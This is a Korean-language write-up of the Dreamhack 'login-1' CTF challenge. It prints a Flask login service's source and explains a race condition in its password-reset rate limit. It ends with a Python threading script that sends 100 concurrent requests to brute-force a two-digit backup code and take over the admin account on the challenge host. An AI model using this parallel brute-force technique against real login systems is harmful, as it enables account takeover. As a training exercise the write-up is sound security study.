[Dreamhack] login-1
문제 설명
- python으로 작성된 로그인 기능을 가진 서비스입니다.
- “admin” 권한을 가진 사용자로 로그인하여 플래그를 획득하세요.
풀이
문제 사이트에 접속해보자.
소스 코드는 아래와 같다.
#!/usr/bin/python3
from flask import Flask, request, render_template, make_response, redirect, url_for, session, g
import sqlite3
import hashlib
import os
import time, random
app = Flask(__name__)
app.secret_key = os.urandom(32)
DATABASE = "database.db"
userLevel = {
0 : 'guest',
1 : 'admin'
}
MAXRESETCOUNT = 5
try:
FLAG = open('./flag.txt', 'r').read()
except:
FLAG = '[**FLAG**]'
def makeBackupcode():
return random.randrange(100)
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
db.row_factory = sqlite3.Row
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
@app.route('/')
def index():
return render_template('index.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'GET':
return render_template('login.html')
else:
userid = request.form.get("userid")
password = request.form.get("password")
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE id = ? and pw = ?', (userid, hashlib.sha256(password.encode()).hexdigest() )).fetchone()
if user:
session['idx'] = user['idx']
session['userid'] = user['id']
session['name'] = user['name']
session['level'] = userLevel[user['level']]
return redirect(url_for('index'))
return "<script>alert('Wrong id/pw');history.back(-1);</script>";
@app.route('/logout')
def logout():
session.clear()
return redirect(url_for('index'))
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'GET':
return render_template('register.html')
else:
userid = request.form.get("userid")
password = request.form.get("password")
name = request.form.get("name")
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
if user:
return "<script>alert('Already Exists userid.');history.back(-1);</script>";
backupCode = makeBackupcode()
sql = "INSERT INTO user(id, pw, name, level, backupCode) VALUES (?, ?, ?, ?, ?)"
cur.execute(sql, (userid, hashlib.sha256(password.encode()).hexdigest(), name, 0, backupCode))
conn.commit()
return render_template("index.html", msg=f"<b>Register Success.</b><br/>Your BackupCode : {backupCode}")
@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
if request.method == 'GET':
return render_template('forgot.html')
else:
userid = request.form.get("userid")
newpassword = request.form.get("newpassword")
backupCode = request.form.get("backupCode", type=int)
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
if user:
# security for brute force Attack.
time.sleep(1)
if user['resetCount'] == MAXRESETCOUNT:
return "<script>alert('reset Count Exceed.');history.back(-1);</script>"
if user['backupCode'] == backupCode:
newbackupCode = makeBackupcode()
updateSQL = "UPDATE user set pw = ?, backupCode = ?, resetCount = 0 where idx = ?"
cur.execute(updateSQL, (hashlib.sha256(newpassword.encode()).hexdigest(), newbackupCode, str(user['idx'])))
msg = f"<b>Password Change Success.</b><br/>New BackupCode : {newbackupCode}"
else:
updateSQL = "UPDATE user set resetCount = resetCount+1 where idx = ?"
cur.execute(updateSQL, (str(user['idx'])))
msg = f"Wrong BackupCode !<br/><b>Left Count : </b> {(MAXRESETCOUNT-1)-user['resetCount']}"
conn.commit()
return render_template("index.html", msg=msg)
return "<script>alert('User Not Found.');history.back(-1);</script>";
@app.route('/user/<int:useridx>')
def users(useridx):
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE idx = ?;', [str(useridx)]).fetchone()
if user:
return render_template('user.html', user=user)
return "<script>alert('User Not Found.');history.back(-1);</script>";
@app.route('/admin')
def admin():
if session and (session['level'] == userLevel[1]):
return FLAG
return "Only Admin !"
app.run(host='0.0.0.0', port=8000)
/login 경로 부분을 보면 GET 메소드로 html을 보여주고, userid와 password의 파라미터를 받아와서 SQL 쿼리를 실행하고, 성공하면 아래에 있는 session 값들을 부여하고 있다.
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'GET':
return render_template('login.html')
else:
userid = request.form.get("userid")
password = request.form.get("password")
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE id = ? and pw = ?', (userid, hashlib.sha256(password.encode()).hexdigest() )).fetchone()
if user:
session['idx'] = user['idx']
session['userid'] = user['id']
session['name'] = user['name']
session['level'] = userLevel[user['level']]
return redirect(url_for('index'))
return "<script>alert('Wrong id/pw');history.back(-1);</script>";
/register 경로의 코드를 살펴보면 userid, password, name 파라미터를 받아와서 userid가 똑같은게 존재하는지 한 번 더 확인하고, makeBackupcode
를 이용해 0부터 99까지의 정수 중 하나를 무작위로 선택하여 backupCode 변수에 저장한다. 다음으로 INSERT로 데이터를 넣고 password는 sha256으로 인코딩하고 16진수 문자열로 저장한다.
def makeBackupcode():
return random.randrange(100)
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'GET':
return render_template('register.html')
else:
userid = request.form.get("userid")
password = request.form.get("password")
name = request.form.get("name")
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
if user:
return "<script>alert('Already Exists userid.');history.back(-1);</script>";
backupCode = makeBackupcode()
sql = "INSERT INTO user(id, pw, name, level, backupCode) VALUES (?, ?, ?, ?, ?)"
cur.execute(sql, (userid, hashlib.sha256(password.encode()).hexdigest(), name, 0, backupCode))
conn.commit()
return render_template("index.html", msg=f"<b>Register Success.</b><br/>Your BackupCode : {backupCode}")
/forgot_password 경로는 userid, newpassword, backupCode를 받아오고, 브루트포스 공격을 막기 위해 resetCount 값을 넣어 막은 걸로 보인다. MAXRESETCOUNT 값은 5로 저장되어 있다.
@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
if request.method == 'GET':
return render_template('forgot.html')
else:
userid = request.form.get("userid")
newpassword = request.form.get("newpassword")
backupCode = request.form.get("backupCode", type=int)
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
if user:
# security for brute force Attack.
time.sleep(1)
if user['resetCount'] == MAXRESETCOUNT:
return "<script>alert('reset Count Exceed.');history.back(-1);</script>"
if user['backupCode'] == backupCode:
newbackupCode = makeBackupcode()
updateSQL = "UPDATE user set pw = ?, backupCode = ?, resetCount = 0 where idx = ?"
cur.execute(updateSQL, (hashlib.sha256(newpassword.encode()).hexdigest(), newbackupCode, str(user['idx'])))
msg = f"<b>Password Change Success.</b><br/>New BackupCode : {newbackupCode}"
else:
updateSQL = "UPDATE user set resetCount = resetCount+1 where idx = ?"
cur.execute(updateSQL, (str(user['idx'])))
msg = f"Wrong BackupCode !<br/><b>Left Count : </b> {(MAXRESETCOUNT-1)-user['resetCount']}"
conn.commit()
return render_template("index.html", msg=msg)
return "<script>alert('User Not Found.');history.back(-1);</script>";
/user/:useridx 경로에는 유저의 데이터 값을 보여주고, admin 경로에 접속하여 level 값이 1이면 flag 값을 출력해준다.
@app.route('/user/<int:useridx>')
def users(useridx):
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE idx = ?;', [str(useridx)]).fetchone()
if user:
return render_template('user.html', user=user)
return "<script>alert('User Not Found.');history.back(-1);</script>";
@app.route('/admin')
def admin():
if session and (session['level'] == userLevel[1]):
return FLAG
return "Only Admin !"
먼저 아래와 같이 /user/1, /user/2 경로로 요청을 해봤는데 Apple이라는 값은 UserLevel이 1이고 2라는 경로로 요청하면 Banana라는 아이디가 나오고 UserLevel이 0으로 되어있다.
guest라는 계정을 일단 생성해보았다. 생성하면 아래와 같이 BackupoCode를 알려준다.
로그인하면 네비바에 로그인한 계정이 표시되고 있다.
guest 계정의 useridx 값은 17번으로 다음에 생성되는 계정은 18이라는 것을 알 수 있다.
여기서 이번 문제의 핵심은 SQL Injection은 아닌 것 같다. 왜냐하면 ?
플레이스 홀더를 보면 prepared Statement를 사용하는 것을 조금 짐작할 수 있고, 아래 forgot_password 경로의 코드를 보면 브루트포스의 공격은 막고 있지만 동시 요청의 레이스 컨디션에 대한 공격은 제대로 시큐어코딩이 이루어지지 않았다.
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
if user:
# security for brute force Attack.
time.sleep(1)
if user['resetCount'] == MAXRESETCOUNT:
return "<script>alert('reset Count Exceed.');history.back(-1);</script>"
아래와 같이 threading 모듈을 사용해 1초 안에 병렬 요청으로 많은 요청을 해주게 되면 resetCount 값의 확인과 업데이트가 별도의 작업으로 처리되기 때문에 레이스 컨디션이 발생한다. 따라서 패스워드가 바뀌고 admin 경로에 들어가면 flag 값을 확인할 수 있다.
import threading
import requests
url = 'http://host3.dreamhack.games:11160/forgot_password'
for i in range(1, 101):
data = {
"userid": "Apple",
"newpassword": "Apple",
"backupCode": {i}
}
print(data)
th = threading.Thread(target=requests.post, args=(url, data))
th.start()
댓글남기기